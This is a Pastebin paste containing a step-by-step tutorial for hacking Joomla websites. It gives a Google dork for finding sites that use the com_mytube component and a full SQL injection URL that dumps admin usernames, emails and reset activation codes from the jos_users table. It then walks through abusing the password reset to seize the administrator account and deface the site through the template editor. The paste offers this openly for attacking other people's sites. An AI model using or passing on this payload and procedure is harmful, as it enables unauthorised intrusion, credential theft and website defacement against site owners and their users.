This week only. Pastebin PRO Accounts Christmas Special! Don't miss out!Want more features on Pastebin? Sign Up, it's FREE!
Guest

Joomla

By: Fizche on Aug 27th, 2013  |  syntax: None  |  size: 1.93 KB  |  views: 84  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1.  HOW TO HACK JOOMLA WEBSITES COMPLETE TUTORIAL
  2. There are different ways to hack a Joomla based website ...But today i am posting
  3. one of the finest way to hack Joomla websites....
  4. Tutorial to hack Joomla websites
  5. First Of all you input this
  6. Google Dork :
  7. inurl:"option=com_mytube"
  8.  
  9. enter this dork in Google search box...
  10.  
  11. Next is injecting the target
  12.  
  13. See for this URL:
  14. http://site.com/index.php?option=com_mytube&Itemid=88...
  15.  
  16. Now You have to replace the url like this:
  17.  
  18. Code:
  19. http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
  20.  
  21. If the site is vulnerable, you can see the image like this shown below:
  22.  
  23. We can see username, email and activation code. (username:email:activation code)
  24.  
  25. Now, let this page open and open a new page.
  26.  
  27. 3- Admin password reset
  28.  
  29. Go to:
  30.  
  31. http://www.site.com/index.php?option=com_user&view=reset
  32.  
  33. This is standard Joomla! query for password reset request
  34.  
  35.  
  36. Type the email adress found in step 2 and press Submit.
  37.  
  38. The activation code should be resetted.
  39.  
  40. Return to the first page, refresh the page and take the new activation code.
  41.  
  42. Paste him in the token and press Submit.
  43.  
  44. problem with token.. :((
  45.  
  46. UPDATE: Joomla! 1.5.16 now hashes the reset token
  47.  
  48. if you see a thing like :$1$14411: after the activation code, it will not work
  49.  
  50. 4- Admin Login
  51.  
  52. If you done everything ok, your Password page will load. Enter your new password...
  53. After that go to:
  54.  
  55. http://www.site.com/administrator/
  56.  
  57.  
  58. Standard Joomla portal content management system
  59.  
  60. Enter the username (found in step 2) and your new password, click on Login
  61. Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
  62.  
  63. In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
clone this paste RAW Paste Data